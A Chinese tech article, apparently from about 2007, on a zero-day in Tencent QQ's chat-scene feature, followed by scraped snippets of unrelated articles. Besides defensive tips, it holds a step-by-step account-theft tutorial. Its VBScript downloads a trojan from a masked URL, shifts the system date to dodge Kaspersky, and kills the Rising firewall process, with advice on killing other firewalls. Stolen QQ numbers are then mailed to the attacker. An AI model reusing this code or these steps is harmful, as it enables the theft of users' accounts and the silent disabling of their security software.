惊!QQ新漏洞 腾讯3亿用户遭受威胁 附说明_网络冲浪

根据易观国际发布《2007年第2季度中国即时通讯市场季度监测》报告显示,中国活跃的IM软件账号已经 达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者。可是你知道吗,你的QQ现在很危险了! 

  不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ。想知道他们是怎么做的以及该如何避免自己的QQ 被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞)。

  月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的“QQ场景漏洞”。他们惊奇的发现,不需要有什么高超的技巧,只要懂一点基本的脚本代码编写,就可以轻松地盗取别人的QQ、秘密安装监控软件或破坏系统等。于是,地狱之门就被打开了,所有的QQ用户都被恐惧笼罩着。

  一、QQ场景漏洞的利用原理解析

  聊天场景是QQ软件中的一项基本功能,可以让聊天的双方使用同样的场景,从而拉近聊天用户之间的距离 。不过最新的QQ场景漏洞,可能会让大家的QQ有被盗的风险。

  该漏洞的利用原理很简单,攻击者向其QQ列表内的用户发送一个恶意构造的场景,场景里面包括图片文件、VBScript.qqs文件和Config.qqs文件,其中VBScript.qqs文件就是编写恶意代码的地方,然后在远程系统中执行即可。

  二、QQ场景漏洞的危害有多大

  QQ场景漏洞的危害到底多大?重则可能系统崩溃,资料消失;轻则可能QQ被盗,这些后果都是很严重的。更可怕的是,漏洞的利用方法特别简单,不需要什么操作即可实现,会成为大量手痒的菜鸟黑客们的最爱。

  添加的脚本代码的作用不同,造成的危害性也会不同。比如,如果是一段文件下载脚本代码的话,那么代 码就会自动下载设置的文件并默默地运行。如果下载的是木马后门程序的话,黑客就可以通过木马进行远程控制。如果是一段格式化代码的话,那么磁盘中的文件就会瞬间被清除掉。

  小提示:QQ场景漏洞的危害程度判断是参考了标准的次高危害漏洞(百度搜霸远程执行漏洞)和标准的中等危害漏洞(WMP AU文件除零漏洞)。

三、试用QQ场景漏洞 

  首先,将QQ场景漏洞所需的场景文件下载到本地系统,解压后复制到系统中QQ的安装目录X:\Program Files\Tencent\QQ下面,这样在Scene文件夹中就多了一个场景目录。现在我们就可以进行测试操作,不过为了弹出窗口更加有个性化,我们要对场景目录真的脚本文件进行修改。

  接着,用文本编辑器打开其中的VBScript.qqs文件,在文件代码中找到MsgBox这个消息函数,该函数后面 跟着的就是该场景在执行后弹出的信息内容,这里我们可以将它设置为自己需要弹出的内容信息,比如设置为“电脑报,我的最爱!”。如果你熟悉VBS脚本,可以设置更有个性的语句。

  然后,随便在QQ联系人列表中找一个人,无论对方使用的是QQ还是TM都可以,双击打开其聊天窗口。然后 点击工具栏中的“选择音乐场景”按钮,在弹出的窗口中选择打开“我的场景”标签,并且找到一个和场景目 录名称相同的场景。这样这个带有VBS脚本的场景,就会自动的下载到远程好友的QQ 中并运行。

  四、如何利用QQ场景漏洞盗QQ

  漏洞用熟后,就可以开始盗QQ了。首选下载该漏洞的利用代码,然后进行简单的修改即可。下面就对代码 的关键部分进行讲解。
  iLocal = LCase("c:\mm.exe"):iRemote = LCase("http://www.****.com/mygim.exe")
  代码作用是将文件下载到磁盘中指定的位置,我们只需要把其中的http://www.****.com/mygim.exe改为自
己的木马地址即可。

复制代码 代码如下:

  Set ws = CreateObject("Wscript.Shell") 
 ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide 
  for each ps in getobject("winmgmts:\\.\root\cimv2:win32_proCESs").instances_ 
  if ps.Name="rfwsrv.exe" then 
  ws.run "ntsd -c q -p ps.handle",0 

  这段代码主要有两个作用,首先是通过修改系统的时间,从而让下载的木马程序躲过卡巴斯基的主动防御 功能。接着用于检测系统中是否存在瑞星防火墙,如果存在的话就结束该防火墙的进程。

  当然我们可以依葫芦画瓢来添加结束其他进程的代码,比如要结束金山网镖的进程,只需要将代码if  ps.Name="rfwsrv.exe" Then 中的rfwsrv.exe,替换为金山网镖的进程名称KPFW32.exe即可。经过这一系列的处理以后,盗号木马就能成功的获取远程用户的QQ号码,并且最终发送到我们指定的信箱里面呢。

五、QQ场景漏洞的防范措施 

  由于QQ场景漏洞是一个全新的0DAY漏洞,因此现在还没有现成的安全补丁可以使用,所以只能临时用其他 的方法来进行相关的防范。有的人说TM没有聊天场景,因此可以利用TM来代替QQ,但是经过我们的测试发现TM 依然受到该漏洞的影响。

  同样在联系人列表中任意的选择一位,接着点击工具栏中的“选择音乐场景”按钮,然后在“我的场景”标签中点击“在我的场景设置”按钮。现在只需要在弹出的窗口里面把“接受场景邀请”前面的勾去掉就可以 啦。除此以外,还可以选择Scene目录的属性选项,将它的属性设置为只读即可。

  如果用户已经不信“中标”的话,那么现在还有两种方法可以解决。第一在“我的场景”标签里,选择“ 不使用场景”选项就可以。另外可以直接到QQ目录中的Scene文件夹,将它中的所有内容彻底删除,就可以完全 避免以前的漏洞场景被重新激活。

  六、QQ场景漏洞的预防方案

  由于QQ场景漏洞是通过恶意脚本来进行操作的,因此要预防漏洞的方法就是防止非法的聊天场景写入系统 磁盘。

  我们可以通过一款名为《系统安全盾》的安全软件进行防范,该程序不但可以对设置的文件夹进行有效的 监控,还可以对非法运行的程序进行有效的拦截操作,这样就从多个方面对系统安全进行保护,并且该程序的 自身保护能力也非常的强,只有在正确的输入了确认码后才会弹出,有效的防止程序进程被恶意代码非法结束

  《系统安全盾》运行后,点击程序主界面中“监控设置”菜单中的“监控设置调整”命令。程序在默认的情况下,是无法将文件添加到系统目录的。为了更好的监控下载的聊天场景,我们点击鼠标右键来新增项目,双击新增的项目来设置新的监控路径,然后将项目内容都选择√选项。
  接着再在“文件黑名单”选项里面,将聊天场景中主要的VBScript.qqs文件添加到黑名单,更改配置后一 定要点击“应用设置”按钮进行保存。这样当程序检测到这些可疑文件后,就会立即的进行拦截操作并提示用户。 

时间: 2024-09-20 11:02:46

惊!QQ新漏洞 腾讯3亿用户遭受威胁 附说明_网络冲浪的相关文章

觊觎腾讯过亿用户国金图谋弯道超车

2月12日,国金证券(600109,股吧)(600109.SH)发布补充说明公告,披露了与腾讯网进行战略合作的细节.公司承认,其与腾讯网开展的网络券商.在线理财及线下高端投资者活动在协议期内均为独家合作条款.此前,自国金证券于2013年11月23日公告与腾讯签署战略合作协议以来,公司股票51个交易日内大幅上涨近六成."腾讯之所以选择国金作为战略合作伙伴,其主要原因在于,民营券商的背景有利于双方在互联网金融业务上开展合作,形成线上线下业务的融合."当天,华南一家券商资管负责人表示.&qu

Android安全模式惊爆新漏洞

7月4日消息,据国外媒体报道,企业安全公司Bluebox在谷歌Android安全模式中发现一个新的安全漏洞,会令几乎所有的Android设备成为不设防的受攻击对象. 据Bluebox的安全研究团队称,流氓应用可以通过这个安全漏洞获得Android系统和所有已安装应用的最高访问权限,读取用户设备上的所有数据,搜集所有的密码并建立一个由"常开.常联网和常移动"的间谍设备组成的僵尸网络. Bluebox的首席技术官杰夫佛利斯塔尔(Jeff Forristal)称,利用Android系统中的这

Facebook惊现新漏洞可致黑客删除图片

印度研究人员发现Facebook漏洞凤凰科技讯 北京时间9月3日消息,据科技博客CNET报道,一名印度研究人员发现了Facebook一处最新漏洞,由于该漏洞存在,可致黑客删除存储在Facebook上的任何一张图片.名为阿鲁尔•库马尔(Arul Kumar)的印度研究人员在其博客上利用大篇幅介绍了Facebook的最新漏洞,库马尔称该漏洞位于Facebook的支持页面,并称该漏洞属于"关键"级别,存在于所有浏览器的任一版本上,但通过该漏洞进行的攻击,移动设备最易得手.Facebook移动

Facebook惊现新漏洞可致黑客删除发帖图片

http://www.aliyun.com/zixun/aggregation/17197.html">北京时间9月3日消息,据科技博客CNET报道,一名印度研究人员发现了 Facebook一处最新漏洞,由于该漏洞存在,可致黑客删除存储在Facebook上的任何一张图片. 名为阿鲁尔•库马尔(Arul Kumar)的印度研究人员在其博客上利用大篇幅介绍了Facebook的最新漏洞,库马尔称该漏洞位于Facebook的支持页面,并称该漏洞属于"关键"级别,存在于所有浏览器

手机SIM卡存严重安全漏洞?7.5亿手机受威胁

&http://www.aliyun.com/zixun/aggregation/37954.html">nbsp;    据<纽约时报>报道,德国一位移动安全专家日前透露,其发现了手机SIM卡安全加密技术上的一处漏洞,黑客利用该漏洞可对用户电话进行控制并构成网络犯罪.     德国柏林的"安全研究实验室"创始人卡斯滕·诺尔(Karsten Nohl)表示,SIM卡上的该加密漏洞允许黑客 获取SIM的数字密钥--一个56位的数字序列,黑客利用该密钥可

(转贴)QQ被盗可以这样申述_网络冲浪

QQ被盗可以这样申述 很多人号码申诉时都如实的填写了自己相关真实的证明资料,却老是申诉被拒绝,其中很大的原因是填写资料时提供的证明资料没有足够说服力(特别是号码申诉的"其他证明资料",我想这个问题一定困扰很多人,怎样填写一些只有你本人知道而别人无法得知的柿希? 我的一些申诉的具体方法和大家交流一下:  一.被盗号码QQ资料.历史密码.历史好友.用户个人身份资料.原有密码保护资料,这些资料只要填写半年前就可以了.若原有密码保护或证件号码忘了,就直接在申诉表里注明"忘记了&quo

计算机网络系统安全漏洞分类研究_网络冲浪

写本文的目地是为了总结一些东西,解决在试图构造一个漏洞数据库的过程中碰到的主要问题,也就是如何对计算机网络漏洞进行分类的问题.文中的一些想法并不成熟,有些甚至连自己也不满意,权作抛砖引玉,以期与在这方面有深入研究的同仁交流,共同提高完善.一个计算机网络安全漏洞有它多方面的属性,我认为主要可以用以下几个方面来概括:漏洞可能造成的直接威胁,漏洞的成因,漏洞的严重性,漏洞被利用的方式.以下的讨论将回绕这几个方面对漏洞细分其类.A.按漏洞可能对系统造成的直接威胁 可以大致分成以下几类,事实上一个系统漏洞

iPhone这个漏洞有些严重 上亿用户存潜在危险

苹果公司一直以来强调iOS系统的安全性,用户也为了隐私原因肯购买"牢不可破"的iPhone.iPad和其他苹果装置,虽然经过美国女明星iCloud照片泄漏.FBI破解iPhone 5c等让苹果公司颇为难堪的事情,业内人士和消费者对于iOS的安全性还是颇为认可的,不过苹果系统最新的漏洞就让苹果iOS系统安全的口碑有些尴尬,黑客甚至只需要知道某个iPhone用户的手机号码,就可以利用这个安全漏洞窃取用户的密码,只需一个简单的短信而已. iPhone用户不打开黑客的恶意短信也会中招 在福布斯

让普通QQ号也能克隆QQ好友_网络冲浪

NO.1-普通QQ号照样可以克隆QQ好友  首先,我们要将自己原来的号和新号重新登陆一遍,然后在以旧QQ号命名的文件夹中找到user.db数据库文件,然后复制它,接着再到新号的文件夹里粘贴覆盖原文件,然后再登陆新号,你会发现,好友都在上面了,不过他们是永远不会上线的.先不要着急,接下来就是我们最关键的一步了,打开好友管理器,在好友列表里选中自己想要加的人,选择多人的话要按着ctrl键, 选好后再把刚才选中的好友全拉到陌生人一栏里,看到这里,您可能要问,为什么要删除他们啊?因为这是让他们复活的关键